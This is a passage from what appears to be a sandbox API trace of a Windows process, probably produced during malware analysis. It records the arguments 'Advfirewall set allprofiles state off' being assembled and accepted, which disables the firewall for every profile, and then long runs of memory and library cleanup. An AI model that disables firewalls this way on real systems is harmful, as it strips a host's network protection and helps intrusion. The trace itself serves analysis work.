0x3396d0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3396f0 [0195.580] wcscpy_s (in: _Destination=0x3396f0, _SizeInWords=0xc, _Source="Advfirewall" | out: _Destination="Advfirewall") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339710 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fddd0 [0195.580] wcscpy_s (in: _Destination=0x2fddd0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339730 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339750 [0195.580] wcscpy_s (in: _Destination=0x339750, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x339770 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x339790 [0195.580] wcscpy_s (in: _Destination=0x339790, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3397b0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2fdde0 [0195.580] wcscpy_s (in: _Destination=0x2fdde0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31d9d0 | out: hHeap=0x2b0000) returned 1 [0195.580] GetProcessHeap () returned 0x2b0000 [0195.580] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339650 | out: hHeap=0x2b0000) returned 1 [0195.581] GetProcessHeap () returned 0x2b0000 [0195.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3396f0 | out: hHeap=0x2b0000) returned 1 [0195.581] GetProcessHeap () returned 0x2b0000 [0195.581] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x3396f0 [0195.581] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0195.581] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0195.581] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0195.581] _wcsnicmp (_String1="set", _String2="res", _MaxCount=0x3) returned 1 [0195.581] _wcsnicmp (_String1="set", _String2="imp", _MaxCount=0x3) returned 10 [0195.581] _wcsnicmp (_String1="set", _String2="exp", _MaxCount=0x3) returned 14 [0195.581] _wcsnicmp (_String1="set", _String2="con", _MaxCount=0x3) returned 16 [0195.581] _wcsnicmp (_String1="set", _String2="fir", _MaxCount=0x3) returned 13 [0195.581] _wcsnicmp (_String1="set", _String2="mai", _MaxCount=0x3) returned 6 [0195.581] _wcsnicmp (_String1="set", _String2="mon", _MaxCount=0x3) returned 6 [0195.581] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0195.581] _wcsnicmp (_String1="allprofiles", _String2="help", _MaxCount=0xb) returned -7 [0195.581] _wcsnicmp (_String1="allprofiles", _String2="?", _MaxCount=0xb) returned 34 [0195.581] wcstok (in: _String="domainprofile", _Delimiter=" ", _Context=0x146a90*=0x0 | out: _String="domainprofile", _Context=0x146a90*=0x0) returned="domainprofile" [0195.581] _wcsnicmp (_String1="allprofiles", _String2="domainprofi", _MaxCount=0xb) returned -3 [0195.581] wcstok (in: _String="privateprofile", _Delimiter=" ", _Context=0x146ac0*=0x0 | out: _String="privateprofile", _Context=0x146ac0*=0x0) returned="privateprofile" [0195.581] _wcsnicmp (_String1="allprofiles", _String2="privateprof", _MaxCount=0xb) returned -15 [0195.581] wcstok (in: _String="publicprofile", _Delimiter=" ", _Context=0x146af0*=0x0 | out: _String="publicprofile", _Context=0x146af0*=0x0) returned="publicprofile" [0195.581] _wcsnicmp (_String1="allprofiles", _String2="publicprofi", _MaxCount=0xb) returned -15 [0195.581] wcstok (in: _String="currentprofile", _Delimiter=" ", _Context=0x146b20*=0x0 | out: _String="currentprofile", _Context=0x146b20*=0x0) returned="currentprofile" [0195.581] _wcsnicmp (_String1="allprofiles", _String2="currentprof", _MaxCount=0xb) returned -2 [0195.581] wcstok (in: _String="allprofiles", _Delimiter=" ", _Context=0x13c7f0*=0x0 | out: _String="allprofiles", _Context=0x13c7f0*=0x0) returned="allprofiles" [0195.581] _wcsnicmp (_String1="allprofiles", _String2="allprofiles", _MaxCount=0xb) returned 0 [0195.581] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0201.653] LoadStringW (in: hInstance=0x0, uID=0x2, lpBuffer=0x1a30d0, cchBufferMax=8192 | out: lpBuffer="Ok.\n") returned 0x4 [0201.653] FormatMessageW (in: dwFlags=0x500, lpSource=0x1a30d0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1a30b0, nSize=0x0, Arguments=0x1a30c0 | out: lpBuffer="峠2") returned 0x5 [0201.653] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0201.653] GetConsoleOutputCP () returned 0x1b5 [0201.653] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0201.653] GetProcessHeap () returned 0x2b0000 [0201.653] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2fddf0 [0201.653] GetConsoleOutputCP () returned 0x1b5 [0201.653] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Ok.\r\n", cchWideChar=-1, lpMultiByteStr=0x2fddf0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ok.\r\n", lpUsedDefaultChar=0x0) returned 6 [0201.654] WriteFile (in: hFile=0x7, lpBuffer=0x2fddf0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1a3060, lpOverlapped=0x0 | out: lpBuffer=0x2fddf0*, lpNumberOfBytesWritten=0x1a3060*=0x5, lpOverlapped=0x0) returned 1 [0201.654] GetProcessHeap () returned 0x2b0000 [0201.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fddf0 | out: hHeap=0x2b0000) returned 1 [0201.654] LocalFree (hMem=0x325ce0) returned 0x0 [0201.654] FormatMessageW (in: dwFlags=0x500, lpSource=0x1351504, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x1a70e0, nSize=0x0, Arguments=0x1a70f0 | out: lpBuffer="限3") returned 0x2 [0201.654] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0201.654] GetConsoleOutputCP () returned 0x1b5 [0201.655] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3) returned 0x2fddf0 [0201.655] GetConsoleOutputCP () returned 0x1b5 [0201.655] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x2fddf0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0201.655] WriteFile (in: hFile=0x7, lpBuffer=0x2fddf0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1a7090, lpOverlapped=0x0 | out: lpBuffer=0x2fddf0*, lpNumberOfBytesWritten=0x1a7090*=0x2, lpOverlapped=0x0) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fddf0 | out: hHeap=0x2b0000) returned 1 [0201.655] LocalFree (hMem=0x339650) returned 0x0 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395d0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395b0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fdda0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339610 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339630 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fddc0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33a530 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3271c0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3271a0 | out: hHeap=0x2b0000) returned 1 [0201.655] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fddb0 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327140 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3395f0 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339530 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339570 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339550 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2fdd80 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x339590 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327120 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327180 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327160 | out: hHeap=0x2b0000) returned 1 [0201.656] GetProcessHeap () returned 0x2b0000 [0201.656] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x327100 | out: hHeap=0x2b0000) returned 1 [0202.171] GetProcessHeap () returned 0x2b0000 [0202.171] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x30f410 | out: hHeap=0x2b0000) returned 1 [0202.172] FreeLibrary (hLibModule=0x1350000) returned 1 [0202.172] FreeLibrary (hLibModule=0x7fef2f70000) returned 1 [0202.184] free (_Block=0x297e00) [0202.187] LocalFree (hMem=0x2d4550) returned 0x0 [0202.187] LocalFree (hMem=0x2d48a0) returned 0x0 [0202.187] LocalFree (hMem=0x2d49b0) returned 0x0 [0202.187] LocalFree (hMem=0x2d3050) returned 0x0 [0202.187] LocalAlloc (uFlags=0x40, uBytes=0x340) returned 0x338380 [0202.187] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x2d3050 [0202.187] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x3376b0 [0202.187] free (_Block=0x295a70) [0202.187] free (_Block=0x0) [0202.187] free (_Block=0x3bdfa0) [0202.187] free (_Block=0x295a90) [0202.187] free (_Block=0x297de0) [0202.188] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x33d660 [0202.200] LocalFree (hMem=0x33d660) returned 0x0 [0202.200] LocalFree (hMem=0x2d49d0) returned 0x0 [0202.200] LocalFree (hMem=0x338380) returned 0x0 [0202.200] free (_Block=0x297bd0) [0202.200] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x7fefdee0000 [0202.200] FreeLibrary (hLibModule=0x7fefdee0000) returned 1 [0202.200] LocalFree (hMem=0x3376b0) returned 0x0 [0202.200] LocalFree (hMem=0x2d3050) returned 0x0 [0202.201] GlobalHandle (pMem=0x2d4330) returned 0x9d0008 [0202.201] GlobalUnlock (hMem=0x9d0008) returned 0 [0202.207] FreeLibrary (hLibModule=0x7fef91b0000) returned 1 [0202.208] FreeLibrary (hLibModule=0x7fef91a0000) returned 1 [0202.226] FreeLibrary (hLibModule=0x7fef33e0000) returned 1 [0202.228] FreeLibrary (hLibModule=0x7fef33d0000) returned 1 [0202.228] FreeLibrary (hLibModule=0x7fef33a0000) returned 1 [0202.229] FreeLibrary (hLibModule=0x7fef3160000) returned 1 [0202.230] FreeLibrary (hLibModule=0x7fef3390000) returned 1 [0202.231] FreeLibrary (hLibModule=0x7fef3100000) returned 1 [0202.235] FreeLibrary (hLibModule=0x7fef86c0000) returned 1 [0202.237] FreeLibrary (hLibModule=0x7fef86b0000) returned 1 [0202.243] FreeLibrary (hLibModule=0x7fef4d60000) returned 1 [0202.244] FreeLibrary (hLibModule=0x7fef4d40000) returned 1 [0202.245] FreeLibrary (hLibModule=0x7fef4c30000) returned 1 [0202.250] FreeLibrary (hLibModule=0x7fef3000000) returned 1 [0202.463] FreeLibrary (hLibModule=0x7fef2bc0000) returned 1 [0202.467] FreeLibrary (hLibModule=0x7fef2990000) returned 1 [0202.467] FreeLibrary (hLibModule=0x7fef2960000) returned 1 [0202.777] FreeLibrary (hLibModule=0x7fef2830000) returned 1 [0202.778] FreeLibrary (hLibModule=0x7fef2800000) returned 1 [0202.785] FreeLibrary (hLibModule=0x7fef2710000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3051b0 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d07a0 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d07c0 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d07e0 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0800 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0820 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.788] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0840 | out: hHeap=0x2b0000) returned 1 [0202.788] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0890 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d08b0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d08d0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d08f0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0910 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0930 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0950 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0970 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0990 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d09b0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d09d0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d09f0 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0a10 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0a30 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0a50 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.789] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0a70 | out: hHeap=0x2b0000) returned 1 [0202.789] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0a90 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0ab0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0ad0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0af0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0b10 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0b30 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0b50 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0b70 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0b90 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0bb0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0bd0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0bf0 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0c10 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0c30 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0c50 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0c70 | out: hHeap=0x2b0000) returned 1 [0202.790] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0c90 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0cb0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0cd0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0cf0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0d10 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0d30 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0d50 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0d70 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0d90 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0db0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0dd0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0df0 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0e10 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0e30 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0e50 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0e70 | out: hHeap=0x2b0000) returned 1 [0202.791] GetProcessHeap () returned 0x2b0000 [0202.791] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0e90 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0eb0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0ed0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0ef0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0f10 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0f30 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0f50 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0f70 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0f90 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0fb0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0fd0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d0ff0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1010 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1030 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1090 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.792] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d10b0 | out: hHeap=0x2b0000) returned 1 [0202.792] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d10d0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d10f0 | out: hHeap=0x2b0000) returned 1 [0202.793] GetProcessHeap () returned 0x2b0000 [0202.793] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 